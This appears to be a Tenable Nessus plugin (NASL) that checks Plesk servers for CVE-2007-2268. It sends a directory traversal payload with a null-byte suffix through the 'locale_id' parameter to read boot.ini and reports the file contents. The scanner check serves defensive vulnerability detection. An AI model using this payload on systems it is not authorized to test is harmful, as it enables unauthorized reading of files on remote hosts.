#
#  (C) Tenable Network Security, Inc.
#


 desc = "
Synopsis :

The remote web server contains a PHP application that is prone to a
directory traversal attack. 

Description :

The remote host is running Plesk, a control panel used to administer
and manage web sites. 

The version of Plesk installed on the remote host fails to sanitize
user-supplied input to the 'locale_id' parameter of the 'login.php3',
'login_up.php', and 'top.php3' scripts before using it to access
files.  On a Windows platform, an unauthenticated attacker can
leverage this issue to read the content of arbitrary files on the
remote host, subject to the privileges of the web server user id. 

See also :

http://forum.swsoft.com/showthread.php?threadid=42912
http://kb.swsoft.com/en/1798

Solution :

Apply appropriate patch based on the vendor advisory referenced above. 

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";


if (description)
{
  script_id(25090);
  script_version("$Revision: 1.5 $");

  script_cve_id("CVE-2007-2268");
  script_bugtraq_id(23639);
  script_xref(name:"OSVDB", value:"34081");
  script_xref(name:"OSVDB", value:"34082");

  script_name(english:"Plesk locale_id Parameter Directory Traversal Vulnerability");
  script_summary(english:"Tries to read boot.ini using Plesk's login script"); 
 
  script_description(english:desc);
 
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Try to read a file.
file = "../../../../../../../../../../../../boot.ini";

req = http_get(
  item:string(
    "/login_up.php3?",
    "login_name=x&",
     "passwd=x&",
     "locale_id=", file, "%00.jpg"
  ), 
  port:port
);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if (res == NULL) exit(0);


# There's a problem if it looks like we were successful.  
if ("[boot loader]" >< res)
{
  content = res - strstr(res, "<!DOCTYPE");
  if ("[boot loader]" >!< res) content = res;

  report = string(
    desc,
    "\n\n",
    "Plugin output :\n",
    "\n",
    "Here are the contents of the file '\\boot.ini' that Nessus\n",
    "was able to read from the remote host :\n",
    "\n",
    content
  );
  security_warning(port:port, data:report);
}
